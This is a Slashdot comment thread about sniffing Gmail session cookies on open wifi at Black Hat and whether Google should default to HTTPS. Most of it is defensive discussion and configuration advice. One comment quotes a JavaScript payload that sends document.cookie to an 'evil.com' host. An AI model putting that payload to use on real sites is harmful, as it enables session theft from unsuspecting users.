If you read TFA, you'll notice that the guy that got hacked set up an adress for this (getmehacked@gmail.com) and clearly was part of the experiment. It wasn't like he hacked an unsuspecting victim who happened to use gmail during the presentation.

Re:Could be fixed easily by Google. Shame.

[Bob+535604]

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.

A lot of people wouldn't know about this or even look for it and you know it. Google could make https the default or even mandatory, and it would completely kill this entire issue.

Re:Could be fixed easily by Google. Shame.

[TheRaven64]

A huge part of security is having sane defaults. If you support 'secure' and 'insecure' you should default to 'secure,' and let users who know what they are doing, and need 'insecure' behaviour opt into it. You shouldn't default to 'insecure' and make it the users' responsibility to select 'secure.'

Re:I give 10 minutes

[Kadin2048]

I think he's making a reference to this event.

Re:Could be fixed easily by Google. Shame.

[KingEomer]

Google does support SSL. Try logging into https://gmail.google.com/

However, I do admit that it is rather odd that they don't advertise this. They should make a point of telling users not using https to do so, if possible. I only found out about this from a /. post a week or so ago.

Re:I give 10 minutes

What the hell does Apple have to do with GMail?

They're both designated targets by MS-paid astroturfers.

Re:check this out!!!

What the fuck are 'milfy bewbs'? English motherfucker, do you speak it?

Re:Could be fixed easily by Google. Shame.

[xaxa]

"I fail to see how the average person, as usual, being lax about their security is in any way Google's fault."

It's Google's fault for allowing unencrypted access to the email service (without any warning) and as the default.

"This was something I found immediately, just because I won't check my email without a secure connection."

You are hardly the average person then.

Always use https://gmail.google.com

[StandardCell]

Although they don't have a public key scheme strong enough for the AES-256 (requires 15360-bit RSA or 256-bit ECC for public key), you should always be logging in using https://gmail.google.com/ from all locations (even home) to ensure the entire session is encrypted.

Re:Always use https://gmail.google.com

[afidel]

Hmm, when I look at the page info and click on security in Firefox it says the connection is using AES-256. Do you mean they are reducing the effectiveness of the AES-256 session by having a relatively weak 1120 bit public key?

Re:Always use https://gmail.google.com

[StandardCell]

That's exactly the problem. Using RSA around the 1k-bit key strength is equivalent to 80 bits of symmetric key strength. AES-256 is a waste otherwise because all you need to do is attack the public key encryption to extract the symmetric key, and voila.

Re:Always use https://gmail.google.com

[StandardCell]

Sorry, that should've been 521-bit ECC since PK strength for ECC is half the number of bits.

ssl and gmai.

[jshriverWVU]

if you put a https instead of http for gmail.google.com it'll work. I dont understand why they don't do this by default if they already support it.

Re:ssl and gmai.

[pomerol]

Well, I suspect that the reason they don't serve GMail access over SSL by default is greed and/or the desire to be "green". Serving web content over SSL put significantly higher strain on servers. In Google's case this equates to more CPU cycles and that translates to higher power requirements. More power means higher costs for Google and more carbon emissions into Earth's atmosphere. I would like to believe that "do-no-evil" Google is doing this for the latter reason.

Re:ssl and gmai.

[Niten]

I don't know, I'm hesitant to believe that the decision to default to non-SSL connections in GMail resulted from some sort of ethical deliberation. It was probably just a matter of "we'd need to buy $X worth of hardware to support all our users connecting over SSL, so we don't see the benefit in providing this unless the customers really begin to demand it". In other words, just business as usual.

Re:ssl and gmai.

[prockcore]

I dont understand why they don't do this by default if they already support it.

Same reason the entire web isn't SSL by default. It takes a considerable amount of CPU compared with unencrypted web traffic.

Re:Could be fixed easily by Google. Shame.

[mtmra70]

A quick check of some main email websites and none of them are secure after you log in. Shame on them also?

Security is an application-layer problem.

[Kadin2048]

In summary, secure your wireless AP if you're a user and buy some SSL acceleration hardware so you can support forcing all traffic on your website to use SSL if you're a service provider.

I agree with the latter recommendation about using SSL, but saying 'secure your wireless AP' doesn't do a lot to help the many public wifi locations; I think it's unhealthy to ever assume that a wireless connection will be secure. As more wireless networks are rolled out, and more people get laptops with built-in wireless and traipse happily from home to their local coffeeshop, where they're sharing an IP and an unencrypted connection with many untrusted users, opportunities for sniffing and hijacking are only going to become more common.

As users demand more portability, security and authentication need to be moved (and kept) up at the application layer, and not simply assumed as part of the datalink or physical layers.

Re:Security is an application-layer problem.

[tootired]

That's why I use dd-wrt and have my home router set up as a vpn. So when I'm on an unsecured public wireless, I just connect to my vpn and route all traffic through it. Yes it is a "tiny" bit slower, but i never have to worry about someone sniffing anything except encrypted packets.

Re:Could be fixed easily by Google. Shame.

[teknopurge]

We have redirects setup on all plain-text channels that have a login to SSL, and have for the past 6 years; this is beyond common-sense.

Yes, it is.

[Kadin2048]

You're right that the exploit itself really isn't that new. What's new is twofold:

1) It's being done to Gmail, a service provided by People Who Should Know Better.
2) There is now a tool that allows any script kiddie to do it, meaning that it's no longer a theoretical exploit; it's something that your next-door neighbor is going to be doing to you (or your slightly less-technically-savvy family/friends) if you don't take precautions.

#2 is probably most significant, since it's really what's going to cause #1 to change. Sometimes, producing a GUIed, Windows-based exploit tool is the fastest way to get a problem fixed, because it's the easiest way to turn an academic argument into a real-world security issue that will get resources thrown at it. (Of course, it may also land you in jail.)

Kismet

How is this any different than using kismet?

Re:Could be fixed easily by Google. Shame.

[fbjon]

They shouldn't tell anyone, just transparently redirect to the secure URL. Sane defaults, and all that jazz. Or at least semi-transparently, with a "redirecting..." page that has a link to both encrypted and unencrypted login URLs, in case some network blocks https.

Re:I give 10 minutes

[fbjon]

That's the point!

Truly, an ingenious troll.

Re:I give 10 minutes

[teknopurge]

I like your handle..... doing anything later??? ;)

Inquiring minds want to know

Could this have been avoided by using a so-called Poxie Server?

Re:Inquiring minds want to know

I still can't work out if STR is for real or a blatant pisstake.. I mean.. AARGGHH!

Re:Inquiring minds want to know

It's 100% fake, like Colbert. "Satire" I do believe is what they're going for.

Re:Inquiring minds want to know

[CrazyKen]

Oh my... that digg article almost made me /wrists.

Re:Could be fixed easily by Google. Shame.

[BewireNomali]

correct me if I'm wrong, but don't most who complain about microsoft OSes point to prior defaults to administrator privileges as a major security concern? If so, by that same reasoning, shouldn't web services default to more secure configurations as opposed to less?

Re:I give 10 minutes

I'll go:

TFA shows photos of two laptops involved in the traffic cloning thing. While they are not Apple laptops, Apple does indeed make laptops. If they did not it would not be possible to clone cookies from an Apple laptop, thus you could not clone a person's Gmail session, neither using your Apple laptop nor they using theirs.

This is also true of desktops.

Can you clone the Gmail cookies of the Amish? No you cannot, they do not have Apple computers.

Also, almost certainly someone inside the Apple Corporation owns Google stock, or vice versa, further proving Apple's cuplability in the matter.

Re:Could be fixed easily by Google. Shame.

[huge]

Shame on them also?

Yes.

Even if there are others with the same problem doesn't give you excuse to ignore the problem.

Re:I give 10 minutes

[Creepy]

well, at least Amiga is more secure against wireless IP packet sniffing and cookie stealing (yes, there is a wireless driver for Amiga).

oh wait, it isn't.

trolling today, are we?

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Could be fixed easily by Google. Shame.

[Threni]

It seems strange that Google don't do this. Is doing so more expensive in terms of server time, or certificates, or something? Otherwise, why not do it?

Cookie Monters with Black Hats

[HOTTILA.COM]

That's my cookie you teratogenic monster!!!!

Easy fix

[teslatug]

Bookmark the secure address and use that (who wouldn't over open wireless??). You could also use http://www.customizegoogle.com/ with Firefox if you're using Gmail to force it to go to the secure URL.

So it's a Man In The Middle attack...

Big whoop. The normal difficulty of the attack is that you have be "in the middle" between the client and server, something that can be difficult to do on a conventional network. You'd have to hack a box somewhere in the network between the points where packets flow, or try and hack the various networking protocols somehow so the packets are routed to you at.

Wireless just makes this WAY easier, since everyone in a wireless area could be considered to potentially be "in the middle" of everyone else, and able to listen to the 'conversations'.

Re:Could be fixed easily by Google. Shame.

[badfish99]

It's obviously much more expensive in terms of load on the server. And Google presumably take the attitude that anyone who is willing to hand all their email over for Google to look at must not care about security anyway.

Re:Could be fixed easily by Google. Shame.

[Svartalf]

Very MUCH the case.

Better yet, it proves out my premise that services such as these shouldn't be used for anything mission/business critical- PERIOD.

use gmail over https

[buddyglass]

Accessing http://gmail.google.com/ will redirect you to a secure page for login, but after that you're back in plain text. If you start at https://gmail.google.com/ then afaik the rest of your gmail session runs over SSL.

Re:check this out!!!

ha ha. ur stupid. and old.

Yes, but...

[mattgreen]

You forgot this is Google who has erred here, and they have been shown to be Good, so you get people defending their poor security practices simply because they like Google. Are you new here? ;)

Re:Yes, but...

[SatanicPuppy]

What error? Did they ever claim it was secure to send email over an unsecured connection? The service is provided: "...on an AS IS and AS AVAILABLE basis. Google disclaims all responsibility and liability for the availability, timeliness, security or reliability of the Service. Google also reserves the right to modify, suspend or discontinue the Service with or without notice at any time and without any liability to you." Gmail Terms of Use

If you thought anything else, you were out of your fricking mind...It's a free service, and that's free-as-in-beer and free-as-in-beer only gets you so much.

Re:Yes, but...

[mattgreen]

So now it isn't an error?

Unbelievable. Secure by default is not a nice feature, it is the ONLY option when properly engineering something. Free or otherwise. If you think otherwise, then you're doing a grave disservice to your users. Anyway, I'm looking forward to quoting this thread in future security discussions. Evidently, security isn't as important these days, or, it isn't if you're Google.

Re:thank god...

[Howitzer86]

I have never heard of anyone thanking God that they use Yahoo... in my entire life.

Re:Could be fixed easily by Google. Shame.

[InvisblePinkUnicorn]

They default to insecure because if everyone was using their secure server, it would implode. People shouldn't need their hands held.

Re:Could be fixed easily by Google. Shame.

[caseih]

Someone on PRI radio the other day pointed out that if Google defaulted to SSL for gmail, they would experience a server load that would be an order of magnitude more than they currently deal with. So I don't think that SSL is the answer here. What we need to find is a way to do a non-SSL session without a risk of the session being stolen. Perhaps some kind of light-weight cryptographic exchange on every request or something. A cookie that constantly changes and cannot be reused. Some way of making sure that even if the attacker got the initial cookie, he couldn't hijack the session because he'd be missing some vital piece of information that was exchanged over SSL during login.

It's not Google's fault...

[overeduc8ed]

It's not Google's fault -- gmail is still in beta! :)

Not the network's job.

[Kadin2048]

That's dumb. An application should never assume that the network it's connected to is secure. It doesn't matter whether you're plugged into switched Ethernet, a wireless LAN, or IP over carrier pigeon -- if you're designing an application that's going to transmit sensitive/assumed-private data (which email clearly is), it's a mistake to just blithely assume that the network is in any way secure.*

An application like Gmail should be treating all network connections as though they're unencrypted Wifi (or hubbed/shared-media Ethernet -- let's not call out 802.11 when there are so many other networking options that can also be trivially compromised); anything else is bad design.

* I'm aware that SMTP is designed like that (as are many other core Internet protocols), but that doesn't mean it's a good idea or even close to technically correct; it was designed in kinder, gentler, and clearly more naive time, and it's caused a whole lot of pain as a result. To do the same thing today is pretty ridiculous.

Re:Could be fixed easily by Google. Shame.

[cheater512]

All of the above. It needs significantly more cpu, bandwidth and isnt good for compatibility.

Re:Could be fixed easily by Google. Shame.

[Wicko]

Is there a method to do this with Google's Personalized Homepage, as you can enable it to give you a preview of your email? I didn't see any options to change that.

lthough I guess I don't have much to worry about since we don't use wireless in our home.

Re:thank god...

[NeoTerra]

With that said, pass me that bowl of spam. I've got a truckload that arrived today in my yahoo account (assuming it's still active), and I need to get rid of it.

Re:Could be fixed easily by Google. Shame.

The fact of the matter is, that the majority of the population has long ago decided that their personal email is just not something worthy of being secured. "There's nothing in there that is important" they say.

It's a foolish attitude, but that's how most users feel. How many people use PGP? Why should google take on the additional server load and associated cost of defaulting to a secure connection if 99 percent of their users don't give a damn whether or not their email is truly private?

I think it's enough that they provide the security for anyone that cares.

Re:Corporate to require https, Government to ban

Corporate is. They already own the government.

Re:Could be fixed easily by Google. Shame.

[pedramnavid]

Do networks still block HTTPS? What is this, the 90s?

Make it default to https

[ajs318]

#  This is how I did it:
#
#  Actual snippet from my Apache configuration .....  mostly.
#  Some details have been changed to protect the innocent
#  And some details have been changed to protect the guilty
#
#  The virtual host "secure.mydomain.co.uk" cannot be accessed
#  by http; only by https.
#
#  The insecure port
<VirtualHost 10.11.12.13:80>
    ServerName secure.mydomain.co.uk
    DocumentRoot /var/www/
    <Directory /var/www/>
        RedirectMatch ^/[^iI] /insecure/
        # In this directory is a page with a dire warning
        # that https is required to access this server.
        # NB.  To avoid creating an infinite loop, we never
        # redirect if request begins with I or i.
    </Directory>
</VirtualHost>
#  The secure port
<VirtualHost 10.11.12.13:443>
    SSLEngine on
    .....
</VirtualHost>

Re:Make it default to https

[RazzleDazzle]

Just fix it for them like this, that way you don't even have to bother with a warning page or anything

        RewriteEngine on
        RewriteCond %{HTTPS} !=on
        RewriteRule ^/(.*) https://youdomainhere/$1 [R,L]

Re:Make it default to https

[RazzleDazzle]

Stupid Slashdot linking. If you have the "show domain" Slashdot prefence for links ignore the '[yourdomainhere]' part.

Re:Make it default to https

[ajs318]

Thanks! I actually need to do some work with mod_rewrite anyway, so I might take you up on that idea.

Re:Make it default to https

[ajs318]

Blame the auto-conversion to hyperlinks on the idiots who couldn't be arsed to use tags, or the idiots who couldn't be arsed to drag over link text, right-click and select the context-menu option of going to the link represented by the selected text (Konqueror has this feature, so one expects all the other ones would have it too -- after all, Windows is sooo much better than Linux, eh?) and blame the "showing the domain in square brackets" thing on the idiots who couldn't be arsed to check the status bar as they hovered the mouse over a link, then got all upset when it turned out to be something different that it looked like.

Re:Could be fixed easily by Google. Shame.

[dr_d_19]

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault.

Maybe because you can simply tie the session to the client IP adress and verify it during each request, which puts an end to the hijacking.

Re:Could be fixed easily by Google. Shame.

People shouldn't need their hands held. But of course, if people allow their Windows machines to be infected by viruses and trojans, then it's Microsoft's fault.

Can someone let me know who to blame, please? The double standards are confusing me.

Re:Could be fixed easily by Google. Shame.

[morgan_greywolf]

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault.

It's called HTML URL redirection. It's been around since...uhhhh....I dunno. Well before 1996, I think.

It's 2007, Google. Use it!

Re:Could be fixed easily by Google. Shame.

[fbjon]

That's the only reason I can think of why Google doesn't immediately send a 301 Permanently moved, and redirect to the https version.

a Blackhat attendee not using a VPN?

[SuperBanana]

Please. Those guys are supposed to be security wizards! And now one of them is caught using plain HTTP to access gmail? I hope they laughed hard at him. Even securety noobs like me know when to use HTTP and HTTPS.

Um...the really smart people aren't using https. They're using http/https via VPN or SSH tunnel to a more trusted network.

Re:a Blackhat attendee not using a VPN?

[dk90406]

That's why I'm calling myself a security noob :)

What about iGoogle?

[wasimmer]

So one can force an SSL connection via https://mail.google.com/ (or similarly with an appropriate Firefox plugin). However, when I try to force an SSL connection to my iGoogle home page by using "https", it simply redirects to an unsecured "http" request. I have widgets on this page displaying my GMail inbox and my google calendar events. I'm assuming this info is handled via insecure requests as well. Is this true? Any way to safeguard against this?

Re:What about iGoogle?

[catxk]

I'm not very knowledgeable on the subject so I would like to know that as well. It would seem to be an issue with all Google account services, perhaps? On the other hand, Google wont let you login from an unsecure page, so your login info isn't "hackable" in this sense. So, the only thing someone could see from hacking you iGoogle is the subject line and sender of your last five emails. Which doesn't mean it's not an issue, just that it doesn't matter much.

Re:What about iGoogle?

[wasimmer]

Right...but if someone is able to grab the appropriate cookies while I access iGoogle....will those cookies authenticate that user for a full gmail session?

Re:Could be fixed easily by Google. Shame.

[It'sYerMam]

You've both implied that people should use the secure server on their own, and that doing so would cause Google's server to break. If Google's secure server doesn't have the capacity to handle a significant proportion of the user base, then that is in effect a wish for people not to use the service securely. Regardless of people not needing their hands held, Google apparently doesn't want to implement secure practices.

Re:Could be fixed easily by Google. Shame.

[bberens]

When I go to my bank or credit card website I never bother to put the https as I'm typing the URL because they will always redirect me to a secure connection. It's a basic and common practice for services with important information. I would argue you shouldn't be putting important information on Google's web servers, but that still doesn't mean that they can't make a very simple change and dramatically increase the security of the data they hold.

Re:Could be fixed easily by Google. Shame.

[jumpingfred]

I have bookmarks for both gmail and my google home page
https://www.google.com/ig
and
https://mail.google.com/mail/

Hacked? At Black Hat??

The real story is that there are actually people dumb enough to use the open wireless at Black Hat.

Re:Could be fixed easily by Google. Shame.

[SatanicPuppy]

I disagree. It's not their responsibility to make you be secure, especially in terms of using their free service. If you give a damn, you'll add the one letter to the url to secure your connection. If you don't you'll keep blissfully using the service unsecured, and that's your own look out.

Its the same as having an unsecured home wireless connection, or leaving your computer plugged directly into the cable modem with no firewall and file sharing turned on. The user must take responsibility for their own security.

Re:Could be fixed easily by Google. Shame.

[Wicko]

Hmm, I tried that but I get a warning from Firefox saying that unencrypted data is being used on an encrypted page, could be possible its refering to something else, like the slashdot RSS feeds or something. Not entirely sure how this all works.

iGoogle widget doesn't use HTTPS

[Solo-Malee]

Worse still though, the g-mail widget on iGoogle doesn't even use https. No way of changing its behavior either.

Re:iGoogle widget doesn't use HTTPS

you apparently have no idea how the hosts file works -- it has nothing to do with protocol transports like http or https so it cannot control them.

Re:iGoogle widget doesn't use HTTPS

[gnarfel]

No you can't, the hosts file that you're describing forces static lookups of certain names. What you've described is redirecting all port 80 traffic to port 443 for that domain name, which would logically be done at the router level (if your router supported such technologies, most today are woefully lacking.)

Well...Duh.

[SatanicPuppy]

Any decent-sized business would run into SOX problems if they used this sort of service consistently, and as a free service they have a very low duty toward their users. If gmail blew up tomorrow and Google decided to discontinue it, it'd be pretty difficult for any users to recover damages seeing as they weren't paying for anything.

Personally, I can't imagine using a non-guaranteed service for anything "mission-critical". If your mission relies on someone else's beta service, your business is in trouble.

Security and the "mobile office"

[mcrbids]

I think it's unhealthy to ever assume that a wireless connection will be secure.

A few days ago my business partners and I were in some podunk town not far from Sacramento for a demonstration. The morning demonstration went well, but the potential customer was cool to buying, and so was kind of short. So there we were, all three of us, in some foreign town around lunch time. We found an ice cream shop that served sandwiches and had a wifi hotspot.

So we whipped out our laptops, took over a table, ordered some ice cream and sandwiches, and spent the afternoon at the ice cream shop. At one point, we all noticed that we were all sitting there, just as productive as if we were in the office. It was fun! And, since I've made it policy to ALWAYS enable SSL when it was possible and/or relevant, security was excellent.

We were sharing files on the company file server. (WebDAV over SSL, with a strong password on a non-standard port. Quite secure - never bothered with NFS or SMB)

We were sending/recieving emails like crazy. (IMAPs with SSL - again quite secure)

We were accessing our web-based company application. (https/SSL encrypted, of course!)

Our company network has NO shared resources that aren't also available from the Internet, and every single connection assumes encryption. Our backups are performed off-site and are encrypted. (rsync over SSH)

Welcome to the brave new world! (It was possible in 1997 or so, I think)

Ferret?

[TechwoIf]

Nice thing that the summery explain what the "Ferret" program was and how to find it. Would be nice to actually show my friends the danger of http (not https) web mail.

Re:Ferret?

[NemesisBubu]

http://www.erratasec.com/ferret.html

Another Extension

[lupine]

I use the Gmail Notifier firefox extension which checks for messages and forces gmail to use secure connections.

I thought ./ readers were security intelligent

It's not just google, stupid. This is a session hijack on web apps. Made friggin trivial. Basically, ssh to a trusted server and proxy all your requests over the tunnel--DNS included. If you use free wireless to freely browse and use webmail even with SSL you're certified idiot nowadays.

Don't shoot the messenger, listen up!

Re:Could be fixed easily by Google. Shame.

i am 100% completely unable to access the http:/// version of gmail.
every single thing I type into the addr bar returns me (or redirects me to) https:///
every single thing.
so wtf's the problem here?

Typical arrogance...

Yeah, like most normal people with real lives would go around making sure their browser maintains a 'secure' connection - get over yourself.

re: Yes it is

1- Robert did not release this tool to the public.
2- Automatic HTTP session hijacking tools have existed for 7+ years.

(new Image()).src= "http://evil.com/?"+document.cookie

Re:Could be fixed easily by Google. Shame.

[awing0]

What do you mean, it isn't good for compatibility? SSL dates back to the early 90's and was present in the two major browsers (Netscape and IE) by 95 or so. Any platform not supporting SSL today does not have any excuses.

Re:Could be fixed easily by Google. Shame.

[awing0]

This won't work when you're on the same network as the attacker. That's the situation that was demonstrated here. There are a number of ways to spoof an IP address on an 802.11 network and have bidirectional communication. Add in the fact that you could be behind a NAT and you don't even need to go through the trouble.

Running all traffic over HTTPS...

[etnu]

Is hardly a viable strategy. Even with the best SSL accelerators, you're lucky to get 30-40% of the performance that plain HTTP gives you. They could certainly prevent man in the middle attacks, but unless you're on an open wifi network, the chances of being caught in a man in the middle are extremely slim. Use WEP or some other encryption mechanism to your router and you really shouldn't have any problems unless your ISP or some back bone router gets compromised. SSL is certainly critical at login time (which is why any website worth mentioning uses it), but SSL for all traffic is unnecessary. The thing that makes me laugh the most is that if all (authenticated) web traffic was done over HTTPS, the people complaining now would be the same ones complaining about how slow the website was.

Re:Running all traffic over HTTPS...

[Malc]

You never used a shared network, like at work or a university, or an Internet Cafe?

Re:Running all traffic over HTTPS...

Running all traffic over HTTPS is hardly a viable strategy If by "all traffic" you're referring to *everything* you do on the internet, then you'll find few who disagree. If by "all traffic" you're referring to *everything* you do within your mailbox or on sites that deal with your financial information, then you'll find the number of those disagreeing with you increased.

When it comes to security, I never say never... except that I never fully trust my ISP or their security personnel to always be on top of things. After all, no one or nothing is infallible or uncrackable. And not everyone at your ISP is trustworthy by default just because they work for your ISP. In fact, I would extend that to include the ISP as a whole.

The clue word here is "sniffing".

[pandrijeczko]

While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google.

This has nothing to do with any Google insecurity.

On a wired switched network, it's only possible to sniff from either a mirrored switch port or from a hub connection that has been put somewhere in the data path of the target being sniffed. Neither of these things are a particularly easy thing to do.

On a wireless network, sure, it's easy if the network is secure and encrypted - but anyone who uses an insecure unecrypted wireless network is a total fool if he or she is surprised that this kind of exploit works.

The fact is if any encryption key exchanges go on between encrypting endpoints, if you can sniff what the two are doing and catch the data flow at the right time as a "man-in-the-middle" attack, it's theoretically possible to intercept just about any type of connection - difficult but possible.

Move along, there really is nothing to see here.

Re:The clue word here is "sniffing".

> On a wired switched network, it's only possible to sniff from
> either a mirrored switch port or from a hub connection that
> has been put somewhere in the data path of the target being sniffed.

This widely held belief is just not true. Do a google search for ARP Poisoning or check out the Cain and Abel APR (arp poison routing) feature. Unless you have a rather new high-end switch with arp poisoning prevention features, any user on the same subnet/VLAN can sniff any or all other ports quite easily. This doesn't help with remote attacks but makes such a man-in-the-middle attack trivial for those in your cube farm or office building floor as long as you share the same IP subnet.

AC

Re:The clue word here is "sniffing".

ARP Poisoning is going to be causing a lot of nightmares for the clueless NA's.
tr

Re:Could be fixed easily by Google. Shame.

I have actually performed a packet capture on an HTTPS connection while I was staying at a hotel on an open wireless AP. Gmail still uses http connections to fetch ads, while sending your session information in a cookie. Bummer.

It's about the Wireless ...

[oistrakh]

I think the reason this very old exploit was brought up is because more and more people are using wireless access points and not realizing how drastically less secure they are than a wired connection. Back when everyone used ethernet, a hacker had to physically get onto the same switch as you to perform this hack. Now they can just pull up in their car on the street outside of the Starbucks that you are at. And yes, google/yahoo/MSN/everyone should be switching to SSL for all this stuff.

Re:Could be fixed easily by Google. Shame.

[ScrewMaster]

Yes. In other words, lock your doors. It's as simple as that, and in the case of GMail it really is that simple. Add the goddamn 's'.

There are times I wonder about this generation. We don't really want to accept that we're responsible for much of anything. Suppose the Internet had been around fifty or sixty years ago. Ask your parents: would they expect to be mollycoddled by their ISPs and free services? I know my father wouldn't have ... if the Internet been around then odds are nobody would have breached his perimeter security, and if someone did crack it, he wouldn't have blamed anyone else but himself.

I take the same approach, and I try not to depend upon anything on the red side of my router to defend me if I can help it. Sometimes you have to take risks, sure, but for God's sakes people, at least do the basics. It's not that hard to keep yourself from being a soft target. Really, it's not.

So, why are we still using the webmail client?

[Wookietim]

With excellent and free clients out there (Like Thunderbird) why would anyone bother using the silly web interface? If you don't have access to your computer, you still have access to your phone and most of them have email programs running on them....

Re:Could be fixed easily by Google. Shame.

[Electrum]

Maybe because you can simply tie the session to the client IP adress and verify it during each request, which puts an end to the hijacking.

Not with NAT, which is typically when you are most vulnerable (i.e. a shared wireless network).

Re:Could be fixed easily by Google. Shame.

[Eric+in+SF]

A quick google search found this:

http://www.urlfilterdb.com/url_filter_faq/block_ht tps_proxy_tunnels.shtml

Repeat after me...

[AndyCR]

The url is httpS://mail.google.com. The performance hit isn't noticeable, but the security increase sure is...

Re:Repeat after me...

The url is httpS://mail.google.com. The performance hit isn't noticeable, but the security increase sure is... Yahoo mail uses secure login for ages now. Even if you write "mail.yahoo.com" on your browser, you will be forwarded to a secure page (https://login.yahoo.com) for signing in with a custom image you assign.

I believe they do some javascript crypt stuff if the browser doesn't have https support too.

Re:Repeat after me...

[AndyCR]

Same with Gmail. The difference is, adding httpS to the Gmail URL encrypts the entire session - emails, contacts, any and all gmail traffic - not just the login credentials.

Oh come on.

[SatanicPuppy]

If they had enabled SSL be default, they'd be the only free web mail provider to have done so. That's the way it's done. If you don't like it, might try using a service you have to pay for.

Re:Oh come on.

[mattgreen]

Just because everyone else sucks at it doesn't mean they get a free pass.

And, I'm speaking as someone whose primary email server is one I do pay for. IMAP is nice over a secure connection, if you have a good client (Outlook [Express] blows, the support barely works). It is just that email *is* identity to a lot of the Internet. To make that something that the users have to think to make secure each time (even if it means appending an 's' to the protocol) is just careless. People get tired, make mistakes, and have bad days. Software should be as robust as it can in the face of users that lack clarity of mind.

Yahoo is unencrypted after login also.

I checked my Yahoo Mail before I ever saw your post. Guess what? Yahoo drops to normal http after login. I have yet to find a way to keep Yahoo using https. I will be spending more time this weekend on this, but it looks like Yahoo does the same thing as Google except with Google there is a workaround.

Yahoo.
https://mail.yahoo.com/
You get a certificate warning stating that the certificate is setup for login.yahoo.com. After logging in on that page, you get redirected to your mail account, but it is not encrypted. I have not found a way to login to Yahoo without using their login.yahoo.com page. I will keep looking.

So Yahoo does not stay SSL after logging into the system.

Ciphers and key exchange mechanisms are discrete.

[Medievalist]

that depends on what SSL ciphersuite your browser negotiated. Some SSL ciphersuite support DHE keying. For others, the client generates a random key, encrypts it with the server's public key, and sends it to the server. Huh? I know TLS theoretically supports other key transfer mechanisms than diffie-hellman, but the last time I checked there wasn't anything else actually implemented, it's just a future compatibility mechanism. I haven't studied SSL since TLS came out, but I don't remember there being any way to avoid diffie-hellman in SSL at all.

I think you'll need to provide some corroborating evidence, my friend. Care to point to a section in the spec where it says you can skip secure key exchange, or post some code, or a trace of a real live browser doing this? Otherwise I think you're blowing smoke. You can't do simple replay attacks on properly configured HTTPS sites, you'd have to have one of the private keys (which are not ever transmitted) in order to get the session key. Even though the client typically generates its' key pair, only the "public" half gets sent, so capturing it boots naught.

That's what SSL/TLS is about. Defeating sniffers.

Re: O RLY? (parent -1 clueless)

[WK2]

But the openness of your wireless network really isn't their problem.

This isn't about wireless networks. Regardless of how you connect, you are connecting through an open network called the internet. The internet being open is not necessarily a problem, but it does present issues in regards to accessing something like email, or banking. Fortunately, there are standard, wide-spread and tested solutions for those issues, such as SSL. Unfortunately, SSL requires the participation of both the end user and the server, and some servers, such as google, are not so cooperative. Google has SSL, but they don't do it right.

It isn't Google's responsibility to secure your connection end-to-end.

As stated above, yes it is.

It's far more reasonable to think that it's your responsibility to not broadcast sensitive information in plaintext!!

That is the only way, if the server doesn't support SSL.

what's a poor webmaster to do?

say you're running a web server which talks plaintext, and say you're using plaintext authentication (at least for the client-initiated login request) and, subsequently, plaintext session cookies. what sort of things can you do to prevent session hijacking on the client side?

aside from obvious stuff, like making the session expire after so much time/activity, or making the cookie itself expire when the client closes the connection (if you can read the week-old cookie file saved in a temp file someplace, you dont need to hack the wireless access point), what precautions can be taken on the server-side?

it's mentioned above that you can keep track of the clients ip address, so that a hijacked cookie must be sent from a machine on the same ip; very soon thereafter it was brought up that if that ip is actually a masqueraded wan ip (as would be the case where most of these hacks would take place), this would do very little to prevent the hijack. somebody chimed in that we can keep track of the http-client-id, but that can just as easily be replicated by the attacker.

hmm. i suppose a dedicated hijacker could (and would) copy anything in our http handshake, and we're vulnerable to his attack as long as we talk plaintext. we can't very well blame our clients just 'cause they're behind an insecure or dinky wep-open wlan; indeed they usually have no control over starbucks' networks or don't know any better anyway.

so here's my question - if our server is plaintext, and for whatever reason we can't modify the server to enable ssl, what are we to do? please, refrain from solutions involving cheap javascript snippets.

Re:Could be fixed easily by Google. Shame.

[devilspgd]

This could be implemented reasonably easily, with a few limitations.

During login, the server supplies the client a secret, and a rotating block of garbage. On each request, the client hashes the secret and the garbage together and supplies the hash to the server.

The server can supply a new block of garbage at any time, replay attacks will only be effective until a new block of garbage is supplied.

If you want a fairly secure connection, you rotate the garbage on each significant request (every request that pulls user data -- You don't need to rotate for JPGs, static JS, etc). The downside is that you can't use multiple windows get far more complex (although still possible, each time there is a mismatch, switch back to SSL and have the client supply the original secret, and start a new series -- Multiple windows are possible, but much more difficult to implement)

The advantage is that calculating hashes is fairly trivial, so you won't need the overhead of SSL. The downside is that the data transferred in each session is insecure, so a snoop could still read every email you read, write, every contact you touch, etc. However, the snoop couldn't intercept your session and request NEW data.

Re:Could be fixed easily by Google. Shame.

[AeroIllini]

The user must take responsibility for their own security. Yet we turn around and lambaste Microsoft for allowing users to run as Administrator by default, having no-password logins, not locking down the registry, and allowing 3rd party developers to still require admin privileges just to run a userspace application.

The point is, security is more than just "what's available." It also has to be about how good the defaults are. The technical community cried foul when Microsoft included a firewall in Windows XP but didn't have it turned on by default, and we complained so much that in SP2 Microsoft finally changed the default.

I agree that security is ultimately the responsibility of the user, but they should not have to seek out secure settings and turn them all on one by one. The default mode for any network-enabled program should be Secure. If the user needs Insecure, then they should have to change a setting to make it so. Spam should be opt-in, security should be opt-out. Anything else is unfair to the user.

Umm, don't the rest do this too?

Everyone is so focused on Google, but it's the only one I know of where you *can* redirect everything to SSL (and I've been doing this for ages now, ever since someone mentioned it on Slashdot back when Gmail was new).

What about Yahoo, Hotmail, etc.?

You can always spoof it.

[SanityInAnarchy]

Many others have pointed out that an IP address isn't exactly reliable even under normal circumstances. AOL people are, in fact, behind a load-balancing proxy. Some people carry their laptop between home and work, and like not having to login. What's more, NAT is still too common -- if you're on a wireless AP, unless it's one of the few, rare ones that get it right, you'll have the same IP address as half a dozen other people.

(Iowa State University assigns every laptop a real, Internet-facing IP, which is the same no matter where you go on their wireless network. If you know what you're doing, you can assign multiple mac addresses to the same machine, meaning you can go wireless, or plug in to the ethernet in the dorms, and still have the same IP. But they are the exception, not the rule.)

But even assuming none of that applied -- assume, say, that you live at Iowa State University, and never carry that laptop anywhere else, so your IP is always the same, and no one else ever shares it.

It's still entirely too easy to spoof mac addresses, let alone IP addresses.

And then you could spoof it.

[SanityInAnarchy]

